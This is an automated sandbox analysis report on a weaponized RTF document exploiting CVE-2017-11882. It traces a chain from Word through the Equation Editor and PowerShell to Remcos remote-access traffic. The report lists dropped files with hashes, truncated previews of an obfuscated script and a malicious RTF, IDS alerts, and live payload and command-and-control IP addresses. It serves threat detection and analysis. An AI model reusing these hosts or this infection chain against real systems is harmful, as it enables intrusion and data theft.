Sample name: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winRTF@10/19@470/3
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HCA Information:
                                                      • Successful, ratio: 97%
                                                      • Number of executed functions: 62
                                                      • Number of non-executed functions: 194
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .rtf
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Scroll down
                                                      • Close Viewer
                                                      • Override analysis time to 79898.6860760828 for current running targets taking high CPU consumption
                                                      • Override analysis time to 159797.372152166 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 3420 because there are no executed function
                                                      • Execution Graph export aborted for target powershell.exe, PID 3628 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf
Time | Type | Description
08:00:09 | API Interceptor | 62x Sleep call for process: EQNEDT32.EXE modified
08:00:12 | API Interceptor | 6x Sleep call for process: wscript.exe modified
08:00:13 | API Interceptor | 91x Sleep call for process: powershell.exe modified
08:00:19 | API Interceptor | 6550785x Sleep call for process: RegAsm.exe modified
                                                                                            • 192.3.220.20
                                                                                            Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 192.3.220.20
                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                            • 107.172.130.147
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            05af1f5ca1b87cc9cc9b25185115607dPO.xlsGet hashmaliciousRemcosBrowse
                                                                                            • 207.241.227.96
                                                                                            Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 207.241.227.96
                                                                                            Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 207.241.227.96
                                                                                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                                            • 207.241.227.96
                                                                                            QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                            • 207.241.227.96
                                                                                            REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 207.241.227.96
                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                            • 207.241.227.96
                                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 207.241.227.96
                                                                                            Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 207.241.227.96
                                                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 207.241.227.96
                                                                                            No context
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4760
                                                                                            Entropy (8bit):4.834060479684549
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                                            MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                                            SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                                            SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                                            SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):207544
                                                                                            Entropy (8bit):3.8530934094159677
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:Uo4M7xayz1mE9/y/33+Fgt5p2GwKA6Tr0mduBbVXZ1mpt/k0B1rpYErnFrjP:Uo4M7Mo1mE9o3+RmduDy/k0vpYErn1P
                                                                                            MD5:8BD63BBD24B0B095F3FC481D42FE6205
                                                                                            SHA1:7FB55D0D9D571874C9310A89DB9D23537B43679C
                                                                                            SHA-256:06E9CC594AC61828036FEBA1C86C400BB90AFCDBEC0214C6A1F790EBF32BD615
                                                                                            SHA-512:8429218E158794B86CCB703B3DC41D02CB3E91021DF6F95FE2740DAD2A97B9A7CF2CDD338DF0456AA4E1E5B4393A7A4E968C79839B23F565FFD40A7608042F3B
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                            Category:dropped
                                                                                            Size (bytes):8192
                                                                                            Entropy (8bit):4.91156901700462
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:JCJZMPyFgpIk/q6Mi0XKHjFZgMPZjFg0k/q6Mi0XKHjF:JlPgI3MhKHp3PXm3MhKHp
                                                                                            MD5:7EF965EAC690A13E3058B526117313B8
                                                                                            SHA1:27B02DD1E2A5EC089A067C85BE0B288C13E00AE4
                                                                                            SHA-256:3441B02E659AFFCF7E133554F6D326F8B52E2BD2AB4C7048DA7952DEF5606A04
                                                                                            SHA-512:F8F7769B4F061994E0B1335938B39BBC981DF8F223DB924427E707C3DFADFB748A7257C1F1DD72FC1E0386D1E9BAD281AF4EE011D2F5EA9BA7372685E32E04E5
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):10752
                                                                                            Entropy (8bit):3.5098974218782746
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Drl1IwMH1vf4SYVSwfJGZFEw5hqtCEO2npDXzF9QKvs9hDHdPbrD98W5tQmZ:Drl18V9efJGZCshuHpPDslftQmZ
                                                                                            MD5:40B0C6B735851D9120DC1AB5E2308072
                                                                                            SHA1:3E60F94853ABC810D70EED2944337B66DAB0E103
                                                                                            SHA-256:C356C63FB3E0075191044241212A1230CDD7AE7CF513875C335F7304107C00DA
                                                                                            SHA-512:B2E859F717074D934FC13165B5593E722E3E6BA73FA9D41FE613B6F4035F24DF4E0504590FDE7A54C147E11EBA4EC3CACA55993F7F99AD0A8C9AEA7B01DE2579
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1536
                                                                                            Entropy (8bit):1.3586208805849456
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbG:IiiiiiiiiifdLloZQc8++lsJe1MzZn
                                                                                            MD5:0C25F0A9F81F8CD4BB5C7308EA86F519
                                                                                            SHA1:AFB4AC21FA7E568C818235267612628377D2628C
                                                                                            SHA-256:E2B2484784EA5A546E2E22D6F73FDF076CF34187F1C76AF6E6720B0888320FD3
                                                                                            SHA-512:9FFC085CB422FA14F4C46739081AFAEADB9F7CA11CFA696C97D398E0EC79632A3ADB47D43C9A58D460C72F20A56F6D269AF400E68D94DE94286597DC783E7C0C
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1024
                                                                                            Entropy (8bit):0.05390218305374581
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Fri Sep 27 11:00:07 2024, length=81974, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):1234
                                                                                            Entropy (8bit):4.534819346640586
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:8tujp/XTI54XIjHCdOwew6RHCdOrDv3qZ57u:80V/XTE4YjHCJkHClZ9u
                                                                                            MD5:E67BA2A8B3ABB1D179B8CCF9CDD08E4A
                                                                                            SHA1:F4F2609CF2C0F2C5DF61328B1CCD324590772548
                                                                                            SHA-256:98AF90AB74C79CDE43C22BDF6B8FD53C99A821C6A05579A3618D08F5F74107AD
                                                                                            SHA-512:719A2BCC3F5C50E31544BABC3C243DE04EBA1CB031E4C56DD5B7D002160C1C8DAAB15EA4969652B3CA4503202EBD5860720672E9B49BD97C81ABBAE3C76C57EF
                                                                                            Malicious:false
                                                                                            Preview:L..................F.... .......r.......r....g......6@......................'....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....;Y.`..user.8......QK.X;Y.`*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.6@..;Y.` .SECURI~1.RTF..........WE..WE.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...2.2.7.5.9...7.3.8.8...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\172892\Users.user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf.Q.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.7.-.1.1.8.8.2...1.2.3...2.2.7.5.9...7.3.8.8...r.t.f.........:..,.LB.)...Ag...............1SP
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:Generic INItialization configuration [folders]
                                                                                            Category:dropped
                                                                                            Size (bytes):143
                                                                                            Entropy (8bit):4.967340002873673
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:H9rbcK+JiMXelfLprXCm4P8bcK+JiMXelfLprXCv:H9rwKNHprNwKNHprc
                                                                                            MD5:F7ED7BD237F516102C09C512BF1E85F6
                                                                                            SHA1:13ABD893E079007C90DA4B892CF612B9CF609074
                                                                                            SHA-256:FFE9E1A49ABE3F351861CF487C0BB3084D551B2EC241807987A9565CF67922F0
                                                                                            SHA-512:FD4F1C0E114C1ED4AF77E2ECDE4EC4C7AD61170527176E9DCFC1AD8764E9E1FE5DFD3FA5E83B01D27309D096352456BD7DF429AF2F5A1F372CC5DDB17243D8CF
                                                                                            Malicious:false
                                                                                            Preview:[misc]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.LNK=0..[folders]..SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.LNK=0..
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):162
                                                                                            Entropy (8bit):2.5038355507075254
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:vrJlaCkWtVyDSK5RiuWElkY9ln:vdsCkWtaSArT9l
                                                                                            MD5:27999515AA910F0641A8B92A3F5A20F1
                                                                                            SHA1:931CD807A73D7D002033458FE922AD8AAA69B44E
                                                                                            SHA-256:506B38612CE35540B2B4646E0534176CF6481F90B7A6260FE308ACF1AF8D2DF7
                                                                                            SHA-512:5DAEC0A6CC939FF6C79B60734E4B5DCBB023A5D4E97EE317B1C2DB579F651D2AD4B32AF279F9C1A620A88285DDF9F4436F18FDC11421C84AEAA8CDF5FCD8014C
                                                                                            Malicious:false
                                                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):207544
                                                                                            Entropy (8bit):3.8530934094159677
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:Uo4M7xayz1mE9/y/33+Fgt5p2GwKA6Tr0mduBbVXZ1mpt/k0B1rpYErnFrjP:Uo4M7Mo1mE9o3+RmduDy/k0vpYErn1P
                                                                                            MD5:8BD63BBD24B0B095F3FC481D42FE6205
                                                                                            SHA1:7FB55D0D9D571874C9310A89DB9D23537B43679C
                                                                                            SHA-256:06E9CC594AC61828036FEBA1C86C400BB90AFCDBEC0214C6A1F790EBF32BD615
                                                                                            SHA-512:8429218E158794B86CCB703B3DC41D02CB3E91021DF6F95FE2740DAD2A97B9A7CF2CDD338DF0456AA4E1E5B4393A7A4E968C79839B23F565FFD40A7608042F3B
                                                                                            Malicious:true
                                                                                            Preview:..i.L.i.k.L.L.U.P.A.L.s.b.x.b. .=. .".T.k.b.m.U.K.s.G.n.f.d.z.b.e.".....G.z.e.W.G.n.p.i.x.O.i.L.x.P. .=. .".f.t.K.W.Z.Q.d.L.K.i.N.i.H.n.".....Q.W.W.G.K.v.K.T.N.O.z.h.e.t. .=. .".C.L.Q.W.v.e.J.L.u.B.j.e.f.L.".....O.v.L.k.i.t.Q.O.N.u.G.m.J.K. .=. .".n.K.R.q.i.p.C.g.z.o.e.P.c.k.".....K.t.G.H.C.L.P.W.i.G.c.v.c.q. .=. .".L.L.k.c.G.K.L.L.q.L.q.x.m.U.".....k.c.u.U.m.e.W.x.W.l.s.W.h.P. .=. .".p.c.a.S.R.L.C.c.v.g.G.m.l.W.".....U.L.a.Z.C.k.Z.k.G.L.L.Z.h.q. .=. .".K.c.P.U.Q.i.p.c.q.W.L.q.L.W.".....c.c.c.i.G.o.O.G.n.R.e.h.e.m. .=. .".C.o.d.L.B.L.G.z.U.A.O.e.P.u.".....K.a.l.h.k.c.k.i.o.N.G.k.t.n. .=. .".Z.U.O.z.f.N.o.L.i.q.S.K.b.S.".....W.A.N.R.l.t.G.L.c.i.b.p.H.p. .=. .".L.u.K.t.e.k.b.W.o.G.J.t.L.d.".........k.q.l.O.A.h.L.b.i.C.G.i.G.u. .=. .".W.O.L.W.t.K.G.c.K.W.K.h.T.z.".....T.f.j.r.U.O.a.K.i.A.Q.x.U.a. .=. .".L.e.A.d.U.f.G.U.K.x.h.h.W.B.".....L.b.m.W.W.c.d.W.x.C.z.x.K.x. .=. .".P.P.B.r.W.f.H.i.e.T.n.H.f.G.".....L.W.Q.U.u.G.R.W.W.i.i.u.i.f. .=. .".C.K.A.t.m.a.L.Z.P.O.R.R.R.c.".....k.Z.K.P.u.K.x.
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):47177
                                                                                            Entropy (8bit):5.2654505915034315
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:323b3W6CIIdbPyqPwB6Q+DtXreyhAZqCU:3SIIY9YbCXr2jU
                                                                                            MD5:5452A15639EA3D67FFE396CCDDE9D05B
                                                                                            SHA1:A9EF0BFF2AF15E45644E1AEF1DD23E5C62E15B80
                                                                                            SHA-256:5B4D0CC0FF5CBA3B30115B950E105562771930A2062F22494781390B4138384E
                                                                                            SHA-512:49914D15F6D0F75AA50012DA58D6A14E9F62E21AAA27AF031553121E9D1EEDD1C6C30E0E9FAD082B51060381CE124AD3C59C03E04EF1920DD2E890AC0937DF63
                                                                                            Malicious:true
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):47177
                                                                                            Entropy (8bit):5.2654505915034315
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:323b3W6CIIdbPyqPwB6Q+DtXreyhAZqCU:3SIIY9YbCXr2jU
                                                                                            MD5:5452A15639EA3D67FFE396CCDDE9D05B
                                                                                            SHA1:A9EF0BFF2AF15E45644E1AEF1DD23E5C62E15B80
                                                                                            SHA-256:5B4D0CC0FF5CBA3B30115B950E105562771930A2062F22494781390B4138384E
                                                                                            SHA-512:49914D15F6D0F75AA50012DA58D6A14E9F62E21AAA27AF031553121E9D1EEDD1C6C30E0E9FAD082B51060381CE124AD3C59C03E04EF1920DD2E890AC0937DF63
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2, Description: detects CVE-2017-8759 weaponized RTF documents., Source: C:\Users\user\Desktop\~WRD0000.tmp, Author: ditekSHen
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                            File type:Rich Text Format data, version 1
                                                                                            Entropy (8bit):2.655149566774923
                                                                                            TrID:
                                                                                            • Rich Text Format (5005/1) 55.56%
                                                                                            • Rich Text Format (4004/1) 44.44%
                                                                                            File name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf
                                                                                            File size:81'974 bytes
                                                                                            MD5:5d0660bf632fd0fa66bc638775eb4b88
                                                                                            SHA1:f55a1c4a78252cc765f1747c321d0812ae0f9f38
                                                                                            SHA256:c3c93d712f93c4abe746760e31182f3cd5dfea00cb99176322f843ac20096697
                                                                                            SHA512:9847cad9018d7c01a1b5d4fb5c9a50b77523f5508605c5f8810bdaffef81b1b609eb41c8c5c8b6d5f0b59cf6832ab14a382c5f01470cacf87b759430fb325607
                                                                                            SSDEEP:384:ityaaa2XK5dRIc5izDPypf8vvv7VPYwnXqTJdeSIAmNvlYA6Jsy01tnGIdN:iMaaTCoeYkoPYwXWlIvlYlJ/01ZGQN
                                                                                            TLSH:8983DE4DE38F81A0CF556677521A4E8846FCB73EF20416B1746C837137ED92E44AA9BC
                                                                                            File Content Preview:{\rtf1.........{\*\lsdlockedexcept638582940 \]}.{\559463615@!59=7,.-:])?3()]#98^[2-%5.<;6.|.2#95*]_@%@:';&=?/>?1<_~??>_?/:>9??]%'^?2=6,.(?#:6!~/.%]$)8<!:.`?.4';(%1<+]<.-+&((,`.!9]7(3`^1%.^.?$|=#(@||./01??=9?01,%?/6>?1;=?$,.56%?+(5?/%*>@6=(_,1.~^.#?4`$&$+?
                                                                                            Icon Hash:2764a3aaaeb7bdbf
Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 000012D5h | | | | | | | | no
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T14:00:18.336027+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 207.241.227.96 | 443 | 192.168.2.22 | 49162 | TCP
2024-09-27T14:00:19.277462+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 185.235.137.223 | 80 | 192.168.2.22 | 49163 | TCP
2024-09-27T14:00:19.277462+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 185.235.137.223 | 80 | 192.168.2.22 | 49163 | TCP
2024-09-27T14:00:24.455225+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49164 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:00:36.906135+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49165 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:00:43.549242+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49166 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:00:45.972234+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49167 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:00:48.920848+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49168 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:00:51.366389+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49169 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:00:54.908881+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49170 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:00:57.365279+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49171 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:00:59.806039+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49172 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:01:02.280898+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49173 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:01:04.729676+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49174 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:01:07.191649+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49175 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:01:09.705313+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49176 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:01:12.307814+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49177 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:01:14.815580+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49178 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:01:17.339635+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49179 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:01:19.774757+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49180 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:02:22.430608+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49181 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:04:13.637193+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49182 | 192.3.101.29 | 14645 | TCP
2024-09-27T14:04:17.612389+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49183 | 192.3.101.29 | 14645 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                            Sep 27, 2024 14:00:12.785243988 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.785269976 CEST4916180192.168.2.22185.235.137.223
                                                                                            Sep 27, 2024 14:00:12.786257982 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.786273956 CEST8049161185.235.137.223192.168.2.22
                                                                                            Sep 27, 2024 14:00:12.786294937 CEST8049161185.235.137.223192.168.2.22
